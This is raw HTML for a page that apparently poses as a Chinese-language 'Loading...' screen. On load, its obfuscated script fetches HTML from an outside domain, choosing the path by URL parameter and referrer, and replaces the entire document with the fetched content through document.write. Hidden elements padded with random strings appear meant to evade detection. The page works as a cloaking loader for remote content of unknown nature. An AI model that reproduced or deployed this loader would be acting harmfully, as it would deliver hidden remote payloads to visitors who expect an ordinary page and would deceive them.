<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .dRnOti {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .dRnOti .OcZYgBbG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .dRnOti .content {
            line-height: 50px;
            text-align: center
        }

        .dRnOti .img {
            width: 100%
        }

        .dRnOti .ylB6Km {
            text-align: center
        }

        .dRnOti .ylB6Km span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .dRnOti .ylB6Km span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .dRnOti .ylB6Km span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .dRnOti .ylB6Km span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .dRnOti .ylB6Km span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .dRnOti .ylB6Km span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .dRnOti .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rfe0JsjWl0vQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var uHVPDju = rfe0JsjWl0vQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ uHVPDju +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ uHVPDju +".html?a=share";
		}
		
        my9q6JZuYt=url+"#"+new Date().getTime();
        my9q6JZuYt && function() {
            $.get(my9q6JZuYt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>xTIQoJbICPg2D02TbTEPyiqxxNxS8dt0ER2Zig98vGfSJhlHt0chwxR27ljCJ9d215gGPwwfWrg2FVOMBUcPFOkZalOqhNfl</div>
<span style='display:none'>EXaPfWfbfG1nCDl4NUxmYZlYXOGChSMqVoxex9OXOrkakmmHkrwFQHYmgBgMBSVy</span>
<ul style='display:none' >UVzBsjbSExDn1SjyfOrpoh61At87mB</ul>
<img  src='' style='display:none'><div class="dRnOti">
    <div class="OcZYgBbG">
        <div class="ylB6Km">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >JDIxOVThXocSmH</ul>
<ul style='display:none' >JDIxOVThXocSmH</ul>
<li style='display:none' >tko9pLodXg1zDmqwtDPyeI0HmYQqfDKSLZdI03AtEMHLe6ZnWbgXbfwGLn3D61y5AvVl2CbSs0EULBr3R068McAmJhPIMvh0</li>
<p  style='display:none'>eLrdDVE8j1hgcYqD0kBI6pL03ihaNvXLAwn3tNdikBeDB</p>
<img  src='' style='display:none'>
<span style='display:none'>wejDB6WvcSL</span>
<img  src='' style='display:none'></body>
</html>